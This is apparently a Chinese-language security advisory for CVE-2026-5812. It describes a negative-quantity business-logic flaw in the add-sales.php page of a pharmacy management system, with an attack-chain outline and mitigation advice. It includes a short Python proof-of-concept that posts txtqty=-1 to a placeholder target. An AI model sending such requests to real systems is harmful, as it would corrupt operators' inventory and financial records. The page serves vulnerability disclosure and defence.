CVE-2026-5812 CVSS 5.4 中危

CVE-2026-5812: 药店管理系统业务逻辑漏洞

披露日期: 2026-04-08

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5812

漏洞类型

业务逻辑错误

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

SourceCodester Pharmacy Product Management System

漏洞概述

SourceCodester Pharmacy Product Management System 1.0版本中存在一个安全漏洞。该漏洞影响组件中的POST参数处理程序，具体位于文件`add-sales.php`中。由于对参数`txtqty`的处理缺乏有效的验证机制，攻击者可以通过操纵该参数触发业务逻辑错误。该漏洞允许攻击者发起远程攻击，且无需用户交互。利用此漏洞可能导致数据完整性受损和系统可用性降低。

技术细节

该漏洞的核心在于`add-sales.php`文件对销售数量参数`txtqty`的处理逻辑存在缺陷。系统未对用户提交的POST参数`txtqty`进行严格的类型、范围及业务逻辑校验（例如验证数量是否为负数）。攻击者只需具备低权限账号，即可构造包含恶意数值（如负数）的HTTP POST请求发送至服务器。服务器端接收该参数后直接用于后续的业务处理（如库存计算或销售记录），导致逻辑混乱，可能引起库存数据被异常扣除或财务报表错误。尽管机密性未受影响，但对系统的完整性和可用性构成了威胁。

攻击链分析

STEP 1

1. 信息收集

识别目标是否运行SourceCodester Pharmacy Product Management System 1.0版本。

STEP 2

2. 获取权限

攻击者注册或使用现有的低权限用户账号登录系统（PR:L）。

STEP 3

3. 漏洞利用

向`add-sales.php`发送POST请求，将`txtqty`参数修改为负数或异常值。

STEP 4

4. 影响达成

服务器端处理异常数据，导致业务逻辑错误，影响系统完整性和可用性。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL vulnerable endpoint
target_url = "http://target/path/add-sales.php"

# Payload data with manipulated 'txtqty' parameter
# Setting quantity to a negative value to trigger business logic error
payload = {
    "txtqty": "-1",  # Malicious input
    "txtproid": "1",
    "txtprice": "100",
    "submit": "true"
}

# Sending the POST request
response = requests.post(target_url, data=payload)

# Checking response
if response.status_code == 200:
    print("PoC executed successfully. Check application state for logic errors.")
else:
    print("Request failed.")

影响范围

SourceCodester Pharmacy Product Management System 1.0

防御指南

临时缓解措施

建议管理员暂时限制对销售功能的访问权限，或部署Web应用防火墙（WAF）规则，拦截包含负数或异常字符的`txtqty`参数请求，直至官方补丁发布并应用。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表